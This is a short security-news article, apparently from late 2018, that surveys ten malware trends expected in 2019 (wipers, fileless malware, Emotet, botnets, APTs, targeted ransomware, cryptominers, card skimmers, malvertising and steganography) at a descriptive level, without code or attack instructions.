Malware authors continue to innovate, find new infection vectors and better obfuscate their wares. Heading into 2019, you can count on cybercriminals will do everything in their power to become even more effective and proficient. Here are 10 top malware trends to watch for in the New Year.
Shamoon, Black Energy, Destover, ExPetr/Not Petya and Olympic Destroyer: All of these wiper malwares, and others like them, have a singular purpose of destroying systems and/or data, usually causing great financial and reputational damage to victim companies. The actors behind this kind of code might be bent on sending a political message, physical sabotage or simply wanting to cover their tracks after data exfiltration. Shamoon 3 recently appeared, so it’s likely that wipers will continue to be an area to watch in 2019.
Fileless malware infects targeted computers leaving behind no artifacts on the local hard drive, making it easy to sidestep traditional signature-based security and forensics tools. Typical attacks exploit vulnerabilities in browsers and associated programs (Java, Flash or PDF readers), or via a phishing efforts. Fileless malware attacks nearly doubled in the first half of 2018 alone, according to SentinelOne, and is sure to plague 2019 too.
Emotet was once a simple banking trojan – but has now evolved to become a full-scale threat-delivery service, with the ability to leverage third-party, open-source code libraries. It recently added a mass email-harvesting module and macro obfuscation, and it continues to be one of the most prevalent malwares out there. Expect it to continue to add new capabilities in the new year.
In 2018, botnets evolved to target different types of devices, such as carrier-grade MikroTik hardware; and, there was also a host of new types of criminal activity, with botherders creating new botnet malwares with modular architectures to do everything from DDoSing targets to spreading secondary malware. New types of configurations surfaced, like self-organizing botnet swarms, and there was increased law enforcement interest – all trends that are expected to continue into 2019.
Nation-state-backed actors continue to operate from the shadows, challenging researchers in attribution and looking to stay as stealthy as possible in order to carry out their espionage efforts. Custom malware is very much a part of the APT scene (although a move to commercial tools has also been spotted), and APTs like Sofacy are actively evolving their code. In 2019, expect APTs to continue to upgrade their bag of tricks to increase the effectiveness of their campaigns.
Attackers behind ransomware incidents are growing smarter and more savvy – as we saw in 2018, in the cases of the Atlanta ransomware attack and the Onslow Water and Sewer Authority (OWASA) ransomware attack. Experts say the attackers behind these attacks did their homework by picking a number that they know the victim can afford to pay, or in the case of the OWASA, a time period (after Hurricane Florence hit) where the water utility was needed.
Cryptominers dominated malware growthin 2018, with attacks increasing by more than 83 percent in the past year according to researchers at Kaspersky Lab, and more than 5 million people attacked with the malware in the first three quarters of 2018. Criminals using this type of malware profited off cryptojacking attacks on the websites of organizations like Make-A-WishInternational or the LA Times.With new variants like MassMiner and the Kitty cryptomining malware bursting into the scene, experts say that cryptominers aren’t going anywhere.
Card-skimming malware has been getting more popular over the past year and that will continue into 2019, according to researchers at RiskIQ who track the Magecart group, a common user of skimmers. In fact, in the past year, 45.8 million records were stolen from in-person transactions using card-skimming malware and point-of-sale (POS) breaches. Threat actors targeted firms like retailers, hotels and restaurants – including Chili’s and Cheddar’s Scratch Kitchen, which were both impacted by payment-card data breaches this year.
Malvertising continues to gain traction as we move into 2019. 2018 saw campaigns with far-reaching consequences: One campaign targeting iOS devices hijacked a whopping 300 million browser sessions in just 48 hours; while another posed as a legitimate website publisher on the AdsTerra online advertising network, instead using maliciously gathered traffic to deliver victims to exploit kits.
Pushing the Steganography Boundaries
Steganography, or “stegware,” has been gaining traction according to Simon Wiseman, chief technology officer of Deep Secures, as more malware payloads hidefrom traditional anti-virus protection when delivered buried inside images, documents or pixels. But in 2018 and moving forward, bad actors are looking to push the limits of stegware by using even newer formats – most recently a new type of malware even received instructions via hidden code embedded in memes posted to Twitter.